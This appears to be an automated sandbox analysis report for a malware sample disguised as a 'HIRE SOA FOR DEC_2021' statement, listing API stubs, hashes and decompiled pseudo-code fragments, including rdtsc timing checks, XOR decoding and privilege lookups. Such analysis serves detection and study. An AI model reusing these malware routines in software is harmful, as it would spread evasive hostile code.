Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3ac100602e3390f266b3f8da4bb52ba04ff6bf72b9e2d14312e223e2ed3bf1dd
Instruction ID: fe07975d001f648d3eabf8a3763410147bd05ed30431dd57c69840e5679f15d7
Opcode Fuzzy Hash: 3ac100602e3390f266b3f8da4bb52ba04ff6bf72b9e2d14312e223e2ed3bf1dd
Instruction Fuzzy Hash: EF90027220100413D611615A46047070459D7D0381F91C476A0414558D96968D62F171

Uniqueness

Uniqueness Score: -1.00%

Function 00B89840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B8984A

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bb778ce584672f736314d4e73f0821a6d0e30fe39f0ef8f97f1209f0002a72f
Instruction ID: a88e5b0e1986ada7e6b421371b0ccf101fbdf9580b517862e1e5c6cb24810763
Opcode Fuzzy Hash: 4bb778ce584672f736314d4e73f0821a6d0e30fe39f0ef8f97f1209f0002a72f
Instruction Fuzzy Hash: CD900262242041525A45B15A45045074456E7E0381791C076A1404950C85669C66E671

Uniqueness

Uniqueness Score: -1.00%

Function 00B899A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B899AA

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7875688bd5521e288166a6d7398a8e94ccb932b56ec48dc508a23612520da96d
Instruction ID: 59fe4c23cdd8774decd6df5a97410bda1e02aa595d133f199c5393c316d5e7e7
Opcode Fuzzy Hash: 7875688bd5521e288166a6d7398a8e94ccb932b56ec48dc508a23612520da96d
Instruction Fuzzy Hash: 189002A234100442D600615A4514B060455D7E1341F51C079E1054554D8659CC62B176

Uniqueness

Uniqueness Score: -1.00%

Function 00B89910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B8991A

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 895ba0c28de031bd9fde2a8ef9a3243d993dac66ef6b2a40e7dceb404fe9908c
Instruction ID: 9d30747746814ea5d6faecf5b8ad1a018f41c50c709c47b27eb697ccb4e9aee8
Opcode Fuzzy Hash: 895ba0c28de031bd9fde2a8ef9a3243d993dac66ef6b2a40e7dceb404fe9908c
Instruction Fuzzy Hash: F59002B220100402D640715A45047460455D7D0341F51C075A5054554E86998DE5B6B5

Uniqueness

Uniqueness Score: -1.00%

Function 00B89A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B89A2A

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d8404dabe3c750ea7176f5303a6e5dd81c9b06c4b027f5ad1cb68fc7f6a736ff
Instruction ID: daccdfd4239cb5b596ccfa4b6531e350267dd472971cdeea1369153b176696c4
Opcode Fuzzy Hash: d8404dabe3c750ea7176f5303a6e5dd81c9b06c4b027f5ad1cb68fc7f6a736ff
Instruction Fuzzy Hash: 6E900262601000424640716A89449064455FBE1351751C175A0988550D85998C75A6B5

Uniqueness

Uniqueness Score: -1.00%

Function 00B89A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B89A0A

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 483ecfb3f8e40ded20423b5ab8f96276f0d8eaedd48e732f7581b9e300362613
Instruction ID: f9e94affb8728f9bf1facf6a1cb5723690caa11c8cfff6c32348d402bb71c72d
Opcode Fuzzy Hash: 483ecfb3f8e40ded20423b5ab8f96276f0d8eaedd48e732f7581b9e300362613
Instruction Fuzzy Hash: 2990027220140402D600615A491470B0455D7D0342F51C075A1154555D86658C61B5B1

Uniqueness

Uniqueness Score: -1.00%

Function 00B89A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B89A5A

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: db99c01af24d9325b46dc3a7c1ac45c5a1ebf42b05ac1ab4ad26abe61acc6baf
Instruction ID: 7008eb23decbf9839e347e0792ebe8e1137ecf2228a9c588f8b0c8966f5f11ed
Opcode Fuzzy Hash: db99c01af24d9325b46dc3a7c1ac45c5a1ebf42b05ac1ab4ad26abe61acc6baf
Instruction Fuzzy Hash: 3C90026221180042D700656A4D14B070455D7D0343F51C179A0144554CC9558C71A571

Uniqueness

Uniqueness Score: -1.00%

Function 00B895D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B895DA

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ee8b2c0ad246d5ec8e0536f3929ada5fb474663f2c1b6c14ed32a37c86f7eeda
Instruction ID: 9fe4dc308842819eb40b8b6014a0f323559e539136f250c482014e0a052b57a8
Opcode Fuzzy Hash: ee8b2c0ad246d5ec8e0536f3929ada5fb474663f2c1b6c14ed32a37c86f7eeda
Instruction Fuzzy Hash: 0D9002A2202000034605715A4514616445AD7E0341B51C075E1004590DC5658CA1B175

Uniqueness

Uniqueness Score: -1.00%

Function 00B89540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B8954A

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a2f6f22faa419cc8f3e38ea17ec701b90b6d86d6cbbef91124383dff0ed6647c
Instruction ID: 035569456e5badaa0b7e658c999ff030d85a7bf1040c90a3ce036d4ea4be9ffa
Opcode Fuzzy Hash: a2f6f22faa419cc8f3e38ea17ec701b90b6d86d6cbbef91124383dff0ed6647c
Instruction Fuzzy Hash: C3900266211000030605A55A07045070496D7D5391351C075F1005550CD6618C71A171

Uniqueness

Uniqueness Score: -1.00%

Function 00B896E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B896EA

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e6df03b5e0daa1cd88fbfe98661063a2cb12e1b6547b0f88410ecc09bac074c0
Instruction ID: 5d3dbfdac7b7f2731f2683bfde4a06217346db93291bf282ddd541cf8b7391b2
Opcode Fuzzy Hash: e6df03b5e0daa1cd88fbfe98661063a2cb12e1b6547b0f88410ecc09bac074c0
Instruction Fuzzy Hash: F490027220108802D610615A850474A0455D7D0341F55C475A4414658D86D58CA1B171

Uniqueness

Uniqueness Score: -1.00%

Function 00B89660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B8966A

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d447f94a353908025ecc0ea8d0674d481075ce865b3d71b2fc3df8d9f58076e4
Instruction ID: 9c958b839a923cf304b99e7aaee3e7aaf9a592fbe1711751a54b2ec6eb1adebb
Opcode Fuzzy Hash: d447f94a353908025ecc0ea8d0674d481075ce865b3d71b2fc3df8d9f58076e4
Instruction Fuzzy Hash: 8490027220100802D680715A450464A0455D7D1341F91C079A0015654DCA558E69B7F1

Uniqueness

Uniqueness Score: -1.00%

Function 00B897A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B897AA

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4b73c0f99fea522c92d19dd303c9cde9bee6c2dac82abbda817f3a98d4ada793
Instruction ID: 883a7200c718a0bd7c84791400e94bd3d77cb6d0d6c6cd980f6d8faf009c5d03
Opcode Fuzzy Hash: 4b73c0f99fea522c92d19dd303c9cde9bee6c2dac82abbda817f3a98d4ada793
Instruction Fuzzy Hash: 9C90026230100003D640715A55186064455E7E1341F51D075E0404554CD9558C66A272

Uniqueness

Uniqueness Score: -1.00%

Function 00B89780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B8978A

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 76f3b1164cc5de6c4b44ffe6a9acf6bb9c16de29c3e6e307a43db286946709ae
Instruction ID: b12e2a5502adb54b1443c686c19998f8198c1bfe728d07f3b9e6688ad300a5d6
Opcode Fuzzy Hash: 76f3b1164cc5de6c4b44ffe6a9acf6bb9c16de29c3e6e307a43db286946709ae
Instruction Fuzzy Hash: 3190026A21300002D680715A550860A0455D7D1342F91D479A0005558CC9558C79A371

Uniqueness

Uniqueness Score: -1.00%

Function 00B89FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B89FEA

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f1e21ecd0897c12fc3f565f5b3a34ff835388e8c9e05854344f2c91c6959ab94
Instruction ID: f88e2165ab8990d631e120254e4bf1df9d9d408205ac23f1b179826fc096b66b
Opcode Fuzzy Hash: f1e21ecd0897c12fc3f565f5b3a34ff835388e8c9e05854344f2c91c6959ab94
Instruction Fuzzy Hash: 8490027231114402D610615A85047060455D7D1341F51C475A0814558D86D58CA1B172

Uniqueness

Uniqueness Score: -1.00%

Function 00B89710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B8971A

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 872b2335eb80953ef206169f8f42ad2f9a8d7e7d91a28c2cdb3c8f7471ec4204
Instruction ID: ac96fb3ab1ca3c65f73d3b37be302ed6a0a8f8f97c18f2aa2480cee580cf1f94
Opcode Fuzzy Hash: 872b2335eb80953ef206169f8f42ad2f9a8d7e7d91a28c2cdb3c8f7471ec4204
Instruction Fuzzy Hash: C790027220100402D600659A55086460455D7E0341F51D075A5014555EC6A58CA1B171

Uniqueness

Uniqueness Score: -1.00%

Function 004088E0 Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E004088E0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* __ebx;
				void* _t24;
				signed int _t31;
				signed int _t33;
				void* _t34;
				signed int _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E30(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407040( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A100( &_v284, 0x104);
						E0041A770( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413E00(_t39, __eflags, E00413DA0(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							__eflags = _t31;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							__eflags = _t50 - 0x62;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							L8:
							_t33 = E00407070(_t39,  &_v24,  &_v840);
							_t55 = _t56 + 8;
							__eflags = _t33;
							if(_t33 != 0) {
								goto L9;
							}
							goto L10;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						_t10 = _t52 + 0x474;
						 *_t10 =  *(_t52 + 0x474) ^  *_t9;
						__eflags =  *_t10;
						_t39 = 1;
						goto L8;
						L9:
						__eflags = _t39;
					} while (_t39 == 0);
					L10:
					_t34 = E004070F0(_t52,  &_v24); // executed
					__eflags = _t39;
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						_t16 = _t52 + 0x55c;
						 *_t16 =  *(_t52 + 0x55c) + 0xffffffba;
						__eflags =  *_t16;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					_t21 = _t52 + 0x32;
					 *_t21 =  *(_t52 + 0x32) +  *_t20 + 1;
					__eflags =  *_t21;
					return 1;
				} else {
					return _t24;
				}
			}

0x004088eb
0x004088f3
0x004088f5
0x004088fa
0x004088ff
0x00408912
0x00408917
0x00408920
0x0040892c
0x0040893f
0x00408944
0x00408947
0x00408950
0x00408962
0x00408967
0x0040896a
0x0040896c
0x00000000
0x00000000
0x0040896e
0x0040896f
0x00408972
0x00000000
0x00000000
0x00408974
0x00408981
0x0040898c
0x00408991
0x00408994
0x00408996
0x00000000
0x00000000
0x00000000
0x00408996
0x00408976
0x00408979
0x00408979
0x00408979
0x0040897f
0x00000000
0x00408998
0x00408998
0x00408998
0x0040899c
0x004089a1
0x004089aa
0x004089ac
0x004089ae
0x004089b4
0x004089b8
0x004089bb
0x004089bb
0x004089bb
0x004089bb
0x004089c2
0x004089c5
0x004089ca
0x004089ca
0x004089ca
0x004089d7
0x00408906
0x00408906
0x00408906

Memory Dump Source

Source File: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_HIRE SOA FOR DEC_2021.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
Instruction ID: 226e528ef8d89cf76aa3651449dca84ee2c763c0567bc665b78f2505a73a72ae
Opcode Fuzzy Hash: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
Instruction Fuzzy Hash: B521F8B2D4420957CB15E6649E42AFF73AC9B50304F04057FE989A2181FA39AB498BA7

Uniqueness

Uniqueness Score: -1.00%

Function 004188C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004188C0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;
				void* _t19;

				E004191F0(_t15, _t19, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413546
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x004188d7
0x004188e2
0x004188ed
0x004188f1

APIs

RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED

Strings

F5A, xrefs: 004188E2, 004188EC

Memory Dump Source

Source File: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_HIRE SOA FOR DEC_2021.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: F5A
API String ID: 1279760036-683449296
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: c53d960059fd60d51188ffd50ae561d8054dda033e2458622c390dbd27fda9b7
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 61E012B1200208ABDB14EF99CC85EA777ACAF88654F118559FE085B242C630F914CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00407290 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00407290(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t33;

				_v68 = 0;
				E0041A150( &_v67, 0, 0x3f);
				E0041AD30( &_v68, 3);
				_t12 = E00409B50(_a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E60(_t33, _a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004092B0(_t14,  &_v68, 1, 8, _t14) & 0x000000ff) - 0x40);
					}
					return _t14;
				}
				return _t13;
			}

0x0040729f
0x004072a3
0x004072ae
0x004072be
0x004072ce
0x004072d3
0x004072da
0x004072dd
0x004072ea
0x004072ee
0x0040730b
0x0040730b
0x00000000
0x0040730d
0x00407312

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA

Memory Dump Source

Source File: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_HIRE SOA FOR DEC_2021.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
Instruction ID: ba3d5bcfed237746ec30380b6ed14dc4a9f69b7da918f5ae44e724b0e7605d49
Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
Instruction Fuzzy Hash: 9C01A771A8032876E721B6959C03FFF776C5B00B55F04011AFF04BA2C2E6A8790687FA

Uniqueness

Uniqueness Score: -1.00%

Function 00418A51 Relevance: 1.5, APIs: 1, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E00418A51(void* __eax, void* __esi, WCHAR* _a4, struct _LUID* _a8) {
				WCHAR* _v0;
				intOrPtr _v4;
				int _t14;
				void* _t19;
				void* _t29;

				asm("cmc");
				asm("lodsb");
				asm("in al, 0x59");
				_push(cs);
				asm("pushad");
				_push(_t23);
				_t11 = _v4;
				E004191F0(_t19, _t29, _v4, _v4 + 0xc8c,  *((intOrPtr*)(_t11 + 0xa18)), 0, 0x46);
				_t14 = LookupPrivilegeValueW(_v0, _a4, _a8); // executed
				return _t14;
			}

0x00418a51
0x00418a52
0x00418a53
0x00418a55
0x00418a56
0x00418a60
0x00418a63
0x00418a7a
0x00418a90
0x00418a94

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90

Memory Dump Source

Source File: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_HIRE SOA FOR DEC_2021.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 83b485b201e4c1e7fd66c774162acfe7eb63079de096458dae94458a2614f4f1
Instruction ID: a9d8e45f0ab8922294ff51e905b395e30dd1976bb4a120057275cc0dd3454d64
Opcode Fuzzy Hash: 83b485b201e4c1e7fd66c774162acfe7eb63079de096458dae94458a2614f4f1
Instruction Fuzzy Hash: 91E06DB56002487BDB10DF59DC85EE73BACAF89750F008954FA486B242D970F855C7F5

Uniqueness

Uniqueness Score: -1.00%

Function 004188F3 Relevance: 1.5, APIs: 1, Instructions: 27
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E004188F3(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t11;
				void* _t17;
				signed int _t21;
				void* _t27;

				asm("std");
				 *0x5562d9cc =  *0x5562d9cc & _t21;
				_push(_t21);
				_t8 = _a4;
				_t3 = _t8 + 0xc74; // 0xc74
				E004191F0(_t17, _t27, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t11 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t11;
			}

0x004188f3
0x004188fb
0x00418900
0x00418903
0x0041890f
0x00418917
0x0041892d
0x00418931

APIs

RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D

Memory Dump Source

Source File: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_HIRE SOA FOR DEC_2021.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 6a825f279a279bf7f9f9b5a882a58c933b459ae0e9fdae7bf20e19aea9457847
Instruction ID: 3a80a7becb793cf7b2adefa23fbc93811d75a2ed840c1ca633e4cb9e02b19bcf
Opcode Fuzzy Hash: 6a825f279a279bf7f9f9b5a882a58c933b459ae0e9fdae7bf20e19aea9457847
Instruction Fuzzy Hash: B0E06D71610209ABD714DF5ADC85EA737A8EF48350F004149F9095B251C631EC14CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00418900 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00418900(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;
				void* _t19;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191F0(_t15, _t19, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041890f
0x00418917
0x0041892d
0x00418931

APIs

RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D

Memory Dump Source

Source File: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_HIRE SOA FOR DEC_2021.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 5f54135a6d5665afae9514b011c4f342711cdf5a633985feeb8d835705c457f1
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 98E012B1200208ABDB18EF99CC89EA777ACAF88750F018559FE085B242C630E914CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418A60 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00418A60(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;
				void* _t19;

				E004191F0(_t15, _t19, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00418a7a
0x00418a90
0x00418a94

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90

Memory Dump Source

Source File: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_HIRE SOA FOR DEC_2021.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: b5f2a6165515d53f35f5e56a9475d77ccb8deec25097a7d382054e427d326996
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 93E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FE0857242C934E8548BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418940 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418940(intOrPtr _a4, int _a8) {
				void* _t10;
				void* _t15;

				_t5 = _a4;
				E004191F0(_t10, _t15, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418943
0x0041895a
0x00418968

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968

Memory Dump Source

Source File: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_HIRE SOA FOR DEC_2021.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 1333b191b135ec901ac61a9cb59cf638980f097d56b5f16c626c7f81ecdb5f9b
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 52D012716002187BD620DF99CC85FD7779CDF48750F018065BA1C5B242C531BA00C6E1

Uniqueness

Uniqueness Score: -1.00%

